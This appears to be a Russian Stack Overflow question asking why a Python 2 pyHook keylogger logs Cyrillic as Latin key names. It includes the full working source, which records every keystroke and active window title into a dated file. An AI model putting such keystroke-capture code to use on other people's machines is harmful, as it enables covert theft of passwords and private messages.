# Keylogger не записывает кириллицу

Tags: python, python-2.x

Есть такой код, но он не записывает кириллицу.

```
import pyHook, pythoncom, sys, logging , os , winsound , time

date = time.strftime("%d.%m.%Y") + ".txt" 
x = time.ctime()
with open(date, "a") as f:
            f.write("\n")
            f.write("[" + x + "] : " )


def OnKeyboardEvent(event):
    global x 

    if event.Key =="Return" :
        with open(date, "a") as f:
            f.write(" {Enter}\n")
            f.write("[" + x +"|"+event.WindowName + "] : " )

    elif event.Key == "Space" :
        with open(date, "a") as f:
            f.write(" ")
    elif event.Key == "Back" :
        with open(date, "a") as f:
            f.write("{Bkspc}")

    else :
        with open(date, "a") as f:
            f.write(event.Key)


    return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

Как я могу это исправить?
Например вместо "привет" у меня в файл записывает `[Wed Aug  8 10:15:27 2018] : GHBDTN`

Comment: Вопросы с просьбами помочь с отладкой («почему этот код не работает?») должны включать желаемое поведение, конкретную проблему или ошибку и минимальный код для её воспроизведения прямо в вопросе. Вопросы без явного описания проблемы бесполезны для остальных посетителей.

Comment: какую ошибку выдаёт, "что" записывает вместо кириллицы?

Comment: Ошибку не выдает, например вместо "привет" записует [Wed Aug  8 10:15:27 2018] : GHBDTN